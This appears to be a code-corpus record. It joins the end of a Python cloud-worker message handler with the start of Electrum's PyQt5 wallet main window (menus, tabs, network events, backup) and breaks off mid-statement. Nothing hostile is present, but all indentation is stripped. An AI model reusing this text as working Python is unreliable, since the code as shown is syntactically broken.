self.worker_status = "Ready"
log.info("Instance %s ready" % self.get_desc())
msplit = msg.split(' | ')
try:
self.num_cpus = int(msplit[2])
except:
log.debug(
"Instance '%s' num CPUs is not int? '%s'" % (self.id, msplit[2]))
log.debug("Instance '%s' reported as having '%s' CPUs." %
(self.id, self.num_cpus))
# Make sure the instace is tagged (this is also necessary to do
# here for OpenStack because it does not allow tags to be added
# until an instance is 'running')
self.app.cloud_interface.add_tag(self.inst, 'clusterName', self.app.ud['cluster_name'])
self.app.cloud_interface.add_tag(self.inst, 'role', 'worker')
self.app.cloud_interface.add_tag(self.inst, 'Name', "Worker: {0}"
.format(self.app.ud['cluster_name']))
log.debug("update condor host through master")
self.app.manager.update_condor_host(self.public_ip)
log.debug("update etc host through master")
self.app.manager.update_etc_host()
elif msg_type == "NODE_STATUS":
msplit = msg.split(' | ')
self.nfs_data = msplit[1]
self.nfs_tools = msplit[2] # Workers currently do not update this field
self.nfs_indices = msplit[3]
self.nfs_sge = msplit[4]
self.get_cert = msplit[5]
self.sge_started = msplit[6]
self.load = msplit[7]
self.worker_status = msplit[8]
self.nfs_tfs = msplit[9]
elif msg_type == 'NODE_SHUTTING_DOWN':
msplit = msg.split(' | ')
self.worker_status = msplit[1]
else: # Catch-all condition
log.debug("Unknown Message: %s" % msg)
else:
log.error("Epic Failure, squeue not available?")
|
main_window.py
|
#!/usr/bin/env python
#
# Electrum - lightweight Bitcoin client
# Copyright (C) 2012 thomasv@gitorious
#
# Permission is hereby granted, free of charge, to any person
# obtaining a copy of this software and associated documentation files
# (the "Software"), to deal in the Software without restriction,
# including without limitation the rights to use, copy, modify, merge,
# publish, distribute, sublicense, and/or sell copies of the Software,
# and to permit persons to whom the Software is furnished to do so,
# subject to the following conditions:
#
# The above copyright notice and this permission notice shall be
# included in all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND,
# EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF
# MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND
# NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS
# BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN
# ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN
# CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
# SOFTWARE.
import sys
import time
import threading
import os
import traceback
import json
import shutil
import weakref
import csv
from decimal import Decimal
import base64
from functools import partial
import queue
import asyncio
from typing import Optional, TYPE_CHECKING, Sequence, List, Union
from PyQt5.QtGui import QPixmap, QKeySequence, QIcon, QCursor, QFont
from PyQt5.QtCore import Qt, QRect, QStringListModel, QSize, pyqtSignal
from PyQt5.QtCore import QTimer
from PyQt5.QtWidgets import (QMessageBox, QComboBox, QSystemTrayIcon, QTabWidget,
QMenuBar, QFileDialog, QCheckBox, QLabel,
QVBoxLayout, QGridLayout, QLineEdit,
QHBoxLayout, QPushButton, QScrollArea, QTextEdit,
QShortcut, QMainWindow, QCompleter, QInputDialog,
QWidget, QSizePolicy, QStatusBar, QToolTip, QDialog,
QMenu, QAction, QStackedWidget, QToolButton)
import electrum
from electrum import (keystore, ecc, constants, util, bitcoin, commands,
paymentrequest, lnutil)
from electrum.bitcoin import COIN, is_address
from electrum.plugin import run_hook, BasePlugin
from electrum.i18n import _
from electrum.util import (format_time,
UserCancelled, profiler,
bh2u, bfh, InvalidPassword,
UserFacingException,
get_new_wallet_name, send_exception_to_crash_reporter,
InvalidBitcoinURI, maybe_extract_bolt11_invoice, NotEnoughFunds,
NoDynamicFeeEstimates, MultipleSpendMaxTxOutputs,
AddTransactionException, BITCOIN_BIP21_URI_SCHEME)
from electrum.invoices import PR_TYPE_ONCHAIN, PR_TYPE_LN, PR_DEFAULT_EXPIRATION_WHEN_CREATING, Invoice
from electrum.invoices import PR_PAID, PR_FAILED, pr_expiration_values, LNInvoice, OnchainInvoice
from electrum.transaction import (Transaction, PartialTxInput,
PartialTransaction, PartialTxOutput)
from electrum.wallet import (Multisig_Wallet, CannotBumpFee, Abstract_Wallet,
sweep_preparations, InternalAddressCorruption,
CannotDoubleSpendTx, CannotCPFP)
from electrum.version import ELECTRUM_VERSION
from electrum.network import (Network, TxBroadcastError, BestEffortRequestFailed,
UntrustedServerReturnedError, NetworkException)
from electrum.exchange_rate import FxThread
from electrum.simple_config import SimpleConfig
from electrum.logging import Logger
from electrum.lnutil import ln_dummy_address, extract_nodeid, ConnStringFormatError
from electrum.lnaddr import lndecode, LnDecodeException
from .exception_window import Exception_Hook
from .amountedit import AmountEdit, BTCAmountEdit, FreezableLineEdit, FeerateEdit
from .qrcodewidget import QRCodeWidget, QRDialog
from .qrtextedit import ShowQRTextEdit, ScanQRTextEdit
from .transaction_dialog import show_transaction
from .fee_slider import FeeSlider, FeeComboBox
from .util import (read_QIcon, ColorScheme, text_dialog, icon_path, WaitingDialog,
WindowModalDialog, ChoicesLayout, HelpLabel, Buttons,
OkButton, InfoButton, WWLabel, TaskThread, CancelButton,
CloseButton, HelpButton, MessageBoxMixin, EnterButton,
import_meta_gui, export_meta_gui,
filename_field, address_field, char_width_in_lineedit, webopen,
TRANSACTION_FILE_EXTENSION_FILTER_ANY, MONOSPACE_FONT,
getOpenFileName, getSaveFileName, BlockingWaitingDialog)
from .util import ButtonsTextEdit, ButtonsLineEdit
from .installwizard import WIF_HELP_TEXT
from .history_list import HistoryList, HistoryModel
from .update_checker import UpdateCheck, UpdateCheckThread
from .channels_list import ChannelsList
from .confirm_tx_dialog import ConfirmTxDialog
from .transaction_dialog import PreviewTxDialog
if TYPE_CHECKING:
from . import ElectrumGui
LN_NUM_PAYMENT_ATTEMPTS = 10
class StatusBarButton(QToolButton):
# note: this class has a custom stylesheet applied in stylesheet_patcher.py
def __init__(self, icon, tooltip, func):
QToolButton.__init__(self)
self.setText('')
self.setIcon(icon)
self.setToolTip(tooltip)
self.setToolButtonStyle(Qt.ToolButtonTextBesideIcon)
self.setAutoRaise(True)
self.setMaximumWidth(25)
self.clicked.connect(self.onPress)
self.func = func
self.setIconSize(QSize(25,25))
self.setCursor(QCursor(Qt.PointingHandCursor))
def onPress(self, checked=False):
'''Drops the unwanted PyQt5 "checked" argument'''
self.func()
def keyPressEvent(self, e):
if e.key() in [ Qt.Key_Return, Qt.Key_Enter ]:
self.func()
def protected(func):
'''Password request wrapper. The password is passed to the function
as the 'password' named argument. "None" indicates either an
unencrypted wallet, or the user cancelled the password request.
An empty input is passed as the empty string.'''
def request_password(self, *args, **kwargs):
parent = self.top_level_window()
password = None
while self.wallet.has_keystore_encryption():
password = self.password_dialog(parent=parent)
if password is None:
# User cancelled password input
return
try:
self.wallet.check_password(password)
break
except Exception as e:
self.show_error(str(e), parent=parent)
continue
kwargs['password'] = password
return func(self, *args, **kwargs)
return request_password
class ElectrumWindow(QMainWindow, MessageBoxMixin, Logger):
payment_request_ok_signal = pyqtSignal()
payment_request_error_signal = pyqtSignal()
network_signal = pyqtSignal(str, object)
#ln_payment_attempt_signal = pyqtSignal(str)
alias_received_signal = pyqtSignal()
computing_privkeys_signal = pyqtSignal()
show_privkeys_signal = pyqtSignal()
show_error_signal = pyqtSignal(str)
payment_request: Optional[paymentrequest.PaymentRequest]
def __init__(self, gui_object: 'ElectrumGui', wallet: Abstract_Wallet):
QMainWindow.__init__(self)
self.gui_object = gui_object
self.config = config = gui_object.config # type: SimpleConfig
self.gui_thread = gui_object.gui_thread
assert wallet, "no wallet"
self.wallet = wallet
if wallet.has_lightning():
self.wallet.config.set_key('show_channels_tab', True)
self.setup_exception_hook()
self.network = gui_object.daemon.network # type: Network
self.fx = gui_object.daemon.fx # type: FxThread
self.contacts = wallet.contacts
self.tray = gui_object.tray
self.app = gui_object.app
self.cleaned_up = False
self.payment_request = None # type: Optional[paymentrequest.PaymentRequest]
self.payto_URI = None
self.checking_accounts = False
self.qr_window = None
self.pluginsdialog = None
self.showing_cert_mismatch_error = False
self.tl_windows = []
self.pending_invoice = None
Logger.__init__(self)
self.tx_notification_queue = queue.Queue()
self.tx_notification_last_time = 0
self.create_status_bar()
self.need_update = threading.Event()
self.completions = QStringListModel()
coincontrol_sb = self.create_coincontrol_statusbar()
self.tabs = tabs = QTabWidget(self)
self.send_tab = self.create_send_tab()
self.receive_tab = self.create_receive_tab()
self.addresses_tab = self.create_addresses_tab()
self.utxo_tab = self.create_utxo_tab()
self.console_tab = self.create_console_tab()
self.contacts_tab = self.create_contacts_tab()
self.channels_tab = self.create_channels_tab()
tabs.addTab(self.create_history_tab(), read_QIcon("tab_history.png"), _('History'))
tabs.addTab(self.send_tab, read_QIcon("tab_send.png"), _('Send'))
tabs.addTab(self.receive_tab, read_QIcon("tab_receive.png"), _('Receive'))
def add_optional_tab(tabs, tab, icon, description, name):
tab.tab_icon = icon
tab.tab_description = description
tab.tab_pos = len(tabs)
tab.tab_name = name
if self.config.get('show_{}_tab'.format(name), False):
tabs.addTab(tab, icon, description.replace("&", ""))
add_optional_tab(tabs, self.addresses_tab, read_QIcon("tab_addresses.png"), _("&Addresses"), "addresses")
add_optional_tab(tabs, self.channels_tab, read_QIcon("lightning.png"), _("Channels"), "channels")
add_optional_tab(tabs, self.utxo_tab, read_QIcon("tab_coins.png"), _("Co&ins"), "utxo")
add_optional_tab(tabs, self.contacts_tab, read_QIcon("tab_contacts.png"), _("Con&tacts"), "contacts")
add_optional_tab(tabs, self.console_tab, read_QIcon("tab_console.png"), _("Con&sole"), "console")
tabs.setSizePolicy(QSizePolicy.Expanding, QSizePolicy.Expanding)
central_widget = QWidget()
vbox = QVBoxLayout(central_widget)
vbox.setContentsMargins(0, 0, 0, 0)
vbox.addWidget(tabs)
vbox.addWidget(coincontrol_sb)
self.setCentralWidget(central_widget)
if self.config.get("is_maximized"):
self.showMaximized()
self.setWindowIcon(read_QIcon("electrum.png"))
self.init_menubar()
wrtabs = weakref.proxy(tabs)
QShortcut(QKeySequence("Ctrl+W"), self, self.close)
QShortcut(QKeySequence("Ctrl+Q"), self, self.close)
QShortcut(QKeySequence("Ctrl+R"), self, self.update_wallet)
QShortcut(QKeySequence("F5"), self, self.update_wallet)
QShortcut(QKeySequence("Ctrl+PgUp"), self, lambda: wrtabs.setCurrentIndex((wrtabs.currentIndex() - 1)%wrtabs.count()))
QShortcut(QKeySequence("Ctrl+PgDown"), self, lambda: wrtabs.setCurrentIndex((wrtabs.currentIndex() + 1)%wrtabs.count()))
for i in range(wrtabs.count()):
QShortcut(QKeySequence("Alt+" + str(i + 1)), self, lambda i=i: wrtabs.setCurrentIndex(i))
self.payment_request_ok_signal.connect(self.payment_request_ok)
self.payment_request_error_signal.connect(self.payment_request_error)
self.show_error_signal.connect(self.show_error)
self.history_list.setFocus(True)
# network callbacks
if self.network:
self.network_signal.connect(self.on_network_qt)
interests = ['wallet_updated', 'network_updated', 'blockchain_updated',
'new_transaction', 'status',
'banner', 'verified', 'fee', 'fee_histogram', 'on_quotes',
'on_history', 'channel', 'channels_updated',
'payment_failed', 'payment_succeeded',
'invoice_status', 'request_status', 'ln_gossip_sync_progress',
'cert_mismatch', 'gossip_db_loaded']
# To avoid leaking references to "self" that prevent the
# window from being GC-ed when closed, callbacks should be
# methods of this class only, and specifically not be
# partials, lambdas or methods of subobjects. Hence...
util.register_callback(self.on_network, interests)
# set initial message
self.console.showMessage(self.network.banner)
# update fee slider in case we missed the callback
#self.fee_slider.update()
self.load_wallet(wallet)
gui_object.timer.timeout.connect(self.timer_actions)
self.fetch_alias()
# If the option hasn't been set yet
if config.get('check_updates') is None:
choice = self.question(title="Electrum - " + _("Enable update check"),
msg=_("For security reasons we advise that you always use the latest version of Electrum.") + " " +
_("Would you like to be notified when there is a newer version of Electrum available?"))
config.set_key('check_updates', bool(choice), save=True)
if config.get('check_updates', False):
# The references to both the thread and the window need to be stored somewhere
# to prevent GC from getting in our way.
def on_version_received(v):
if UpdateCheck.is_newer(v):
self.update_check_button.setText(_("Update to Electrum {} is available").format(v))
self.update_check_button.clicked.connect(lambda: self.show_update_check(v))
self.update_check_button.show()
self._update_check_thread = UpdateCheckThread()
self._update_check_thread.checked.connect(on_version_received)
self._update_check_thread.start()
def setup_exception_hook(self):
Exception_Hook.maybe_setup(config=self.config,
wallet=self.wallet)
def run_coroutine_from_thread(self, coro, on_result=None):
def task():
try:
f = asyncio.run_coroutine_threadsafe(coro, self.network.asyncio_loop)
r = f.result()
if on_result:
on_result(r)
except Exception as e:
self.logger.exception("exception in coro scheduled via window.wallet")
self.show_error_signal.emit(str(e))
self.wallet.thread.add(task)
def on_fx_history(self):
self.history_model.refresh('fx_history')
self.address_list.update()
def on_fx_quotes(self):
self.update_status()
# Refresh edits with the new rate
edit = self.fiat_send_e if self.fiat_send_e.is_last_edited else self.amount_e
edit.textEdited.emit(edit.text())
edit = self.fiat_receive_e if self.fiat_receive_e.is_last_edited else self.receive_amount_e
edit.textEdited.emit(edit.text())
# History tab needs updating if it used spot
if self.fx.history_used_spot:
self.history_model.refresh('fx_quotes')
self.address_list.update()
def toggle_tab(self, tab):
show = not self.config.get('show_{}_tab'.format(tab.tab_name), False)
self.config.set_key('show_{}_tab'.format(tab.tab_name), show)
item_text = (_("Hide {}") if show else _("Show {}")).format(tab.tab_description)
tab.menu_action.setText(item_text)
if show:
# Find out where to place the tab
index = len(self.tabs)
for i in range(len(self.tabs)):
try:
if tab.tab_pos < self.tabs.widget(i).tab_pos:
index = i
break
except AttributeError:
pass
self.tabs.insertTab(index, tab, tab.tab_icon, tab.tab_description.replace("&", ""))
else:
i = self.tabs.indexOf(tab)
self.tabs.removeTab(i)
def push_top_level_window(self, window):
'''Used for e.g. tx dialog box to ensure new dialogs are appropriately
parented. This used to be done by explicitly providing the parent
window, but that isn't something hardware wallet prompts know.'''
self.tl_windows.append(window)
def pop_top_level_window(self, window):
self.tl_windows.remove(window)
def top_level_window(self, test_func=None):
'''Do the right thing in the presence of tx dialog windows'''
override = self.tl_windows[-1] if self.tl_windows else None
if override and test_func and not test_func(override):
override = None # only override if ok for test_func
return self.top_level_window_recurse(override, test_func)
def diagnostic_name(self):
#return '{}:{}'.format(self.__class__.__name__, self.wallet.diagnostic_name())
return self.wallet.diagnostic_name()
def is_hidden(self):
return self.isMinimized() or self.isHidden()
def show_or_hide(self):
if self.is_hidden():
self.bring_to_top()
else:
self.hide()
def bring_to_top(self):
self.show()
self.raise_()
def on_error(self, exc_info):
e = exc_info[1]
if isinstance(e, UserCancelled):
pass
elif isinstance(e, UserFacingException):
self.show_error(str(e))
else:
# TODO would be nice if we just sent these to the crash reporter...
# anything we don't want to send there, we should explicitly catch
# send_exception_to_crash_reporter(e)
try:
self.logger.error("on_error", exc_info=exc_info)
except OSError:
pass # see #4418
self.show_error(repr(e))
def on_network(self, event, *args):
# Handle in GUI thread
self.network_signal.emit(event, args)
def on_network_qt(self, event, args=None):
# Handle a network message in the GUI thread
# note: all windows get events from all wallets!
if event == 'wallet_updated':
wallet = args[0]
if wallet == self.wallet:
self.need_update.set()
elif event == 'network_updated':
self.gui_object.network_updated_signal_obj.network_updated_signal \
.emit(event, args)
self.network_signal.emit('status', None)
elif event == 'blockchain_updated':
# to update number of confirmations in history
self.need_update.set()
elif event == 'new_transaction':
wallet, tx = args
if wallet == self.wallet:
self.tx_notification_queue.put(tx)
elif event == 'on_quotes':
self.on_fx_quotes()
elif event == 'on_history':
self.on_fx_history()
elif event == 'gossip_db_loaded':
self.channels_list.gossip_db_loaded.emit(*args)
elif event == 'channels_updated':
wallet = args[0]
if wallet == self.wallet:
self.channels_list.update_rows.emit(*args)
elif event == 'channel':
wallet = args[0]
if wallet == self.wallet:
self.channels_list.update_single_row.emit(*args)
self.update_status()
elif event == 'request_status':
self.on_request_status(*args)
elif event == 'invoice_status':
self.on_invoice_status(*args)
elif event == 'payment_succeeded':
wallet = args[0]
if wallet == self.wallet:
self.on_payment_succeeded(*args)
elif event == 'payment_failed':
wallet = args[0]
if wallet == self.wallet:
self.on_payment_failed(*args)
elif event == 'status':
self.update_status()
elif event == 'banner':
self.console.showMessage(args[0])
elif event == 'verified':
wallet, tx_hash, tx_mined_status = args
if wallet == self.wallet:
self.history_model.update_tx_mined_status(tx_hash, tx_mined_status)
elif event == 'fee':
pass
elif event == 'fee_histogram':
self.history_model.on_fee_histogram()
elif event == 'ln_gossip_sync_progress':
self.update_lightning_icon()
elif event == 'cert_mismatch':
self.show_cert_mismatch_error()
else:
self.logger.info(f"unexpected network event: {event} {args}")
def fetch_alias(self):
self.alias_info = None
alias = self.config.get('alias')
if alias:
alias = str(alias)
def f():
self.alias_info = self.contacts.resolve_openalias(alias)
self.alias_received_signal.emit()
t = threading.Thread(target=f)
t.setDaemon(True)
t.start()
def close_wallet(self):
if self.wallet:
self.logger.info(f'close_wallet {self.wallet.storage.path}')
self.wallet.thread = None
run_hook('close_wallet', self.wallet)
@profiler
def load_wallet(self, wallet: Abstract_Wallet):
wallet.thread = TaskThread(self, self.on_error)
self.update_recently_visited(wallet.storage.path)
if wallet.has_lightning():
util.trigger_callback('channels_updated', wallet)
self.need_update.set()
# Once GUI has been initialized check if we want to announce something since the callback has been called before the GUI was initialized
# update menus
self.seed_menu.setEnabled(self.wallet.has_seed())
self.update_lock_icon()
self.update_buttons_on_seed()
self.update_console()
self.clear_receive_tab()
self.request_list.update()
self.channels_list.update()
self.tabs.show()
self.init_geometry()
if self.config.get('hide_gui') and self.gui_object.tray.isVisible():
self.hide()
else:
self.show()
self.watching_only_changed()
run_hook('load_wallet', wallet, self)
try:
wallet.try_detecting_internal_addresses_corruption()
except InternalAddressCorruption as e:
self.show_error(str(e))
send_exception_to_crash_reporter(e)
def init_geometry(self):
winpos = self.wallet.db.get("winpos-qt")
try:
screen = self.app.desktop().screenGeometry()
assert screen.contains(QRect(*winpos))
self.setGeometry(*winpos)
except:
self.logger.info("using default geometry")
self.setGeometry(100, 100, 840, 400)
def watching_only_changed(self):
name = "Electrum Testnet" if constants.net.TESTNET else "Electrum"
title = '%s %s - %s' % (name, ELECTRUM_VERSION,
self.wallet.basename())
extra = [self.wallet.db.get('wallet_type', '?')]
if self.wallet.is_watching_only():
extra.append(_('watching only'))
title += ' [%s]'% ', '.join(extra)
self.setWindowTitle(title)
self.password_menu.setEnabled(self.wallet.may_have_password())
self.import_privkey_menu.setVisible(self.wallet.can_import_privkey())
self.import_address_menu.setVisible(self.wallet.can_import_address())
self.export_menu.setEnabled(self.wallet.can_export())
def warn_if_watching_only(self):
if self.wallet.is_watching_only():
msg = ' '.join([
_("This wallet is watching-only."),
_("This means you will not be able to spend Bitcoins with it."),
_("Make sure you own the seed phrase or the private keys, before you request Bitcoins to be sent to this wallet.")
])
self.show_warning(msg, title=_('Watch-only wallet'))
def warn_if_testnet(self):
if not constants.net.TESTNET:
return
# user might have opted out already
if self.config.get('dont_show_testnet_warning', False):
return
# only show once per process lifecycle
if getattr(self.gui_object, '_warned_testnet', False):
return
self.gui_object._warned_testnet = True
msg = ''.join([
_("You are in testnet mode."), ' ',
_("Testnet coins are worthless."), '\n',
_("Testnet is separate from the main Bitcoin network. It is used for testing.")
])
cb = QCheckBox(_("Don't show this again."))
cb_checked = False
def on_cb(x):
nonlocal cb_checked
cb_checked = x == Qt.Checked
cb.stateChanged.connect(on_cb)
self.show_warning(msg, title=_('Testnet'), checkbox=cb)
if cb_checked:
self.config.set_key('dont_show_testnet_warning', True)
def open_wallet(self):
try:
wallet_folder = self.get_wallet_folder()
except FileNotFoundError as e:
self.show_error(str(e))
return
filename, __ = QFileDialog.getOpenFileName(self, "Select your wallet file", wallet_folder)
if not filename:
return
self.gui_object.new_window(filename)
def select_backup_dir(self, b):
name = self.config.get('backup_dir', '')
dirname = QFileDialog.getExistingDirectory(self, "Select your wallet backup directory", name)
if dirname:
self.config.set_key('backup_dir', dirname)
self.backup_dir_e.setText(dirname)
def backup_wallet(self):
d = WindowModalDialog(self, _("File Backup"))
vbox = QVBoxLayout(d)
grid = QGridLayout()
backup_help = ""
backup_dir = self.config.get('backup_dir')
backup_dir_label = HelpLabel(_('Backup directory') + ':', backup_help)
msg = _('Please select a backup directory')
if self.wallet.has_lightning() and self.wallet.lnworker.channels:
msg += '\n\n' + ' '.join([
_("Note that lightning channels will be converted to channel backups."),
_("You cannot use channel backups to perform lightning payments."),
_("Channel backups can only be used to request your channels to be closed.")
])
self.backup_dir_e = QPushButton(backup_dir)
self.backup_dir_e.clicked.connect(self.select_backup_dir)
grid.addWidget(backup_dir_label, 1, 0)
grid.addWidget(self.backup_dir_e, 1, 1)
vbox.addLayout(grid)
vbox.addWidget(WWLabel(msg))
vbox.addLayout(Buttons(CancelButton(d), OkButton(d)))
if not d.exec_():
return
try:
new_path = self.wallet.save_backup()
except BaseException as reason:
self.show_critical(_("Electrum was unable to copy your wallet file to the specified location.") + "\n" + str(reason), title=_("Unable to create backup"))
return
if new_path:
msg = _("A copy of your wallet file was created in")+" '%s'" % str(new_path)
self.show_message(msg, title=_("Wallet backup created"))
else:
self.show_message(_("You need to configure a backup directory in your preferences"), title=_("Backup not created"))
def update_recently_visited(self, filename):
recent = self.config.get('recently_open', [])
try:
sorted(recent)
except:
recent = []
if filename in recent:
recent.remove(filename)
recent.insert(0, filename)
recent = [path for path in recent if os.path.exists(path)]
recent = recent[:5]
self.config.set_key('recently_open', recent)
self.recently_visited_menu.clear()
for i, k in enumerate(sorted(recent)):
b = os.path.basename(k)
def loader(k):
return lambda: self.gui_object.new_window(k)
self.recently_visited_menu.addAction(b, loader(k)).setShortcut(QKeySequence("Ctrl+%d"%(i+1)))
self.recently_visited_menu.setEnabled(len(recent))
def get_wallet_folder(self):
return os.path.dirname(os.path.abspath(self.wallet.storage.path))
def new_wallet(self):
try:
wallet_folder = self.get_wallet_folder()
except FileNotFoundError as e:
self.show_error(str(e))
return
filename = get_new_wallet_name(wallet_folder)
full_path = os.path.join(wallet_folder, filename)
self.gui_object.start_new_window(full_path, None)
def init_menubar(self):
menubar = QMenuBar()
file_menu = menubar.addMenu(_("&File"))
self.recently_visited_menu = file_menu.addMenu(_("&Recently open"))
file_menu.addAction(_("&Open"), self.open_wallet).setShortcut(QKeySequence.Open)
file_menu.addAction(_("&New/Restore"), self.new_wallet).setShortcut(QKeySequence.New)
file_menu.addAction(_("&Save backup"), self.backup_wallet).setShortcut(QKeySequence.SaveAs)
file_menu.addAction(_("Delete"), self.remove_wallet)
file_menu.addSeparator()
file_menu.addAction(_("&Quit"), self.close)
wallet_menu = menubar.addMenu(_("&Wallet"))
wallet_menu.addAction(_("&Information"), self.show_wallet_info)
wallet_menu.addSeparator()
self.password_menu = wallet_menu.addAction(_("&Password"), self.change_password_dialog)
self.seed_menu = wallet_menu.addAction(_("&Seed"), self.show_seed_dialog)
self.private_keys_menu = wallet_menu.addMenu(_("&Private keys"))
self.private_keys_menu.addAction(_("&Sweep"), self.sweep_key_dialog)
self.import_privkey_menu = self.private_keys_menu.addAction(_("&Import"), self.do_import_privkey)
self.export_menu = self.private_keys_menu.addAction(_("&Export"), self.export_privkeys_dialog)
self.import_address_menu = wallet_menu.addAction(_("Import addresses"), self.import_addresses)
wallet_menu.addSeparator()
addresses_menu = wallet_menu.addMenu(_("&Addresses"))
addresses_menu.addAction(_("&Filter"), lambda: self.address_list.toggle_toolbar(self.config))
labels_menu = wallet_menu.addMenu(_("&Labels"))
labels_menu.addAction(_("&Import"), self.do_import_labels)
labels_menu.addAction(_("&Export"), self.do_export_labels)
history_menu = wallet_menu.addMenu(_("&History"))
history_menu.addAction(_("&Filter"), lambda: self.history_list.toggle_toolbar(self.config))
history_menu.addAction(_("&Summary"), self.history_list.show_summary)
history_menu.addAction(_("&Plot"), self.history_list.plot_history_dialog)
history_menu.addAction(_("&Export"), self.history_list.export_history_dialog)
contacts_menu = wallet_menu.addMenu(_("Contacts"))
contacts_menu.addAction(_("&New"), self.new_contact_dialog)
contacts_menu.addAction(_("Import"), lambda: self.import_contacts())
contacts_menu.addAction(_("Export"), lambda: self.export_contacts())
invoices_menu = wallet_menu.addMenu(_("Invoices"))
invoices_menu.addAction(_("Import"), lambda: self.import_invoices())
invoices_menu.addAction(_("Export"), lambda: self.export_invoices())
requests_menu = wallet_menu.addMenu(_("Requests"))
requests_menu.addAction(_("Import"), lambda: self.import_requests())
requests_menu.addAction(_("Export"), lambda: self.export_requests())
wallet_menu.addSeparator()
wallet_menu.addAction(_("Find"), self.toggle_search).setShortcut(QKeySequence("Ctrl+F"))
def add_toggle_action(view_menu, tab):
is_shown = self.config.get('show_{}_tab'.format(tab.tab_name), False)
item_name = (_("Hide") if is_shown else _("Show")) + " " + tab.tab_description
tab.menu_action = view_menu.addAction(item_name, lambda: self.toggle_tab(tab))
view_menu = menubar.addMenu(_("&View"))
add_toggle_action(view_menu, self.addresses_tab)
add_toggle_action(view_menu, self.utxo_tab)
add_toggle_action(view_menu, self.channels_tab)
add_toggle_action(view_menu, self.contacts_tab)
add_toggle_action(view_menu, self.console_tab)
tools_menu = menubar.addMenu(_("&Tools")) # type: QMenu
preferences_action = tools_menu.addAction(_("Preferences"), self.settings_dialog) # type: QAction
if sys.platform == 'darwin':
# "Settings"/"Preferences" are all reserved keywords in macOS.
# preferences_action will get picked up based on name (and put into a standardized location,
# and given a standard reserved hotkey)
# Hence, this menu item will be at a "uniform location re macOS processes"
preferences_action.setMenuRole(QAction.PreferencesRole) # make sure OS recognizes it as preferences
# Add another preferences item, to also have a "uniform location for Electrum between different OSes"
tools_menu.addAction(_("Electrum preferences"), self.settings_dialog)
tools_menu.addAction(_("&Network"), self.gui_object.show_network_dialog).setEnabled(bool(self.network))
tools_menu.addAction(_("&Lightning Gossip"), self.gui_object.show_lightning_dialog).setEnabled(bool(self.wallet.has_lightning() and self.network))
tools_menu.addAction(_("Local &Watchtower"), self.gui_object.show_watchtower_dialog).setEnabled(bool(self.network and self.network.local_watchtower))
tools_menu.addAction(_("&Plugins"), self.plugins_dialog)
tools_menu.addSeparator()
tools_menu.addAction(_("&Sign/verify message"), self.sign_verify_message)
tools_menu.addAction(_("&Encrypt/decrypt message"), self.encrypt_message)
tools_menu.addSeparator()
paytomany_menu = tools_menu.addAction(_("&Pay to many"), self.paytomany)
raw_transaction_menu = tools_menu.addMenu(_("&Load transaction"))
raw_transaction_menu.addAction(_("&From file"), self.do_process_from_file)
raw_transaction_menu.addAction(_("&From text"), self.do_process_from_text)
raw_transaction_menu.addAction(_("&From the blockchain"), self.do_process_from_txid)
raw_transaction_menu.addAction(_("&From QR code"), self.read_tx_from_qrcode)
self.raw_transaction_menu = raw_transaction_menu
run_hook('init_menubar_tools', self, tools_menu)
help_menu = menubar.addMenu(_("&Help"))
help_menu.addAction(_("&About"), self.show_about)
help_menu.addAction(_("&Check for updates"), self.show_update_check)
help_menu.addAction(_("&Official website"), lambda: webopen("https://electrum.org"))
help_menu.addSeparator()
help_menu.addAction(_("&Documentation"), lambda: webopen("http://docs.electrum.org/")).setShortcut(QKeySequence.HelpContents)
if not constants.net.TESTNET:
help_menu.addAction(_("&Bitcoin Paper"), self.show_bitcoin_paper)
help_menu.addAction(_("&Report Bug"), self.show_report_bug)
help_menu.addSeparator()
help_menu.addAction(_("&Donate to server"), self.donate_to_server)
self.setMenuBar(menubar)
def donate_to_server(self):
d = self.network.get_donation_address()
if d:
host = self.network.get_parameters().server.host
self.pay_to_URI('bitcoin:%s?message=donation for %s'%(d, host))
else:
self.show_error(_('No donation address for this server'))
def show_about(self):
QMessageBox.about(self, "Electrum",
(_("Version")+" %s" % ELECTRUM_VERSION + "\n\n" +
_("Electrum's focus is speed, with low resource usage and simplifying Bitcoin.") + " " +
_("You do not need to perform regular backups, because your wallet can be "
"recovered from a secret phrase that you can memorize or write on paper.") + " " +
_("Startup times are instant because it operates in conjunction with high-performance "
"servers that handle the most complicated parts of the Bitcoin system.") + "\n\n" +
_("Uses icons from the Icons8 icon pack (icons8.com).")))
def show_bitcoin_paper(self):
filename = os.path.join(self.config.path, 'bitcoin.pdf')
if not os.path.exists(filename):
s = self._fetch_tx_from_network("54e48e5f5c656b26c3bca14a8c95aa583d07ebe84dde3b7dd4a78f4e4186e713")
if not s:
return
s = s.split("0100000000000000")[1:-1]
out = ''.join(x[6:136] + x[138:268] + x[270:400] if len(x) > 136 else x[6:] for x in s)[16:-20]
with open(filename, 'wb') as f:
f.write(bytes.fromhex(out))
webopen('file:///' + filename)
def show_update_check(self, version=None):
self.gui_object._update_check = UpdateCheck(latest_version=version)
def show_report_bug(self):
msg = ' '.join([
_("Please report any bugs as issues on github:<br/>"),
f'''<a href="{constants.GIT_REPO_ISSUES_URL}">{constants.GIT_REPO_ISSUES_URL}</a><br/><br/>''',
_("Before reporting a bug, upgrade to the most recent version of Electrum (latest release or git HEAD), and include the version number in your report."),
_("Try to explain not only what the bug is, but how it occurs.")
])
self.show_message(msg, title="Electrum - " + _("Reporting Bugs"), rich_text=True)
def notify_transactions(self):
if self.tx_notification_queue.qsize() == 0:
return
if not self.wallet.up_to_date:
return # no notifications while syncing
now = time.time()
rate_limit = 20 # seconds
if self.tx_notification_last_time + rate_limit > now:
return
self.tx_notification_last_time = now
self.logger.info("Notifying GUI about new transactions")
txns = []
while True:
try:
txns.append(self.tx_notification_queue.get_nowait())
except queue.Empty:
break
# Combine the transactions if there are at least three
if len(txns) >= 3:
total_amount = 0
for tx in txns:
tx_wallet_delta = self.wallet.get_wallet_delta(tx)
if not tx_wallet_delta.is_relevant:
continue
total_amount += tx_wallet_delta.delta
self.notify(_("{} new transactions: Total amount received in the new transactions {}")
